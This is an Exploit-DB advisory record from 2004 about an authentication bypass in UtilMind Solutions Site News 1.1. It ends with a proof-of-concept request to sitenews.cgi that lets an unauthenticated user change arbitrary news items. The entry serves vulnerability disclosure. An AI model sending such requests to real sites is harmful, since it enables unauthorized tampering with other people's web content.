UtilMind Solutions Site News 1.1 - Authentication Bypass Vulnerability

EDB-ID: 24576 CVE: N/A OSVDB-ID: N/A
Verified: Author: anonymous Published: 2004-09-07
Download Exploit: Source Raw Download Vulnerable App: N/A
source: http://www.securityfocus.com/bid/11126/info

Reportedly UtilMind Solutions Site News is affected by an authentication bypass vulnerability. This issue is due to an access validation error.

An unauthenticated attacker can leverage this issue to display and manipulate arbitrary news items.

http://www.example.com/ sitenews.cgi?update\?oldsubject=OLD_SUBJ&subject=NEW_SUBJ&name=ANY_NAME&issue=ISSUE&message=MESSAGE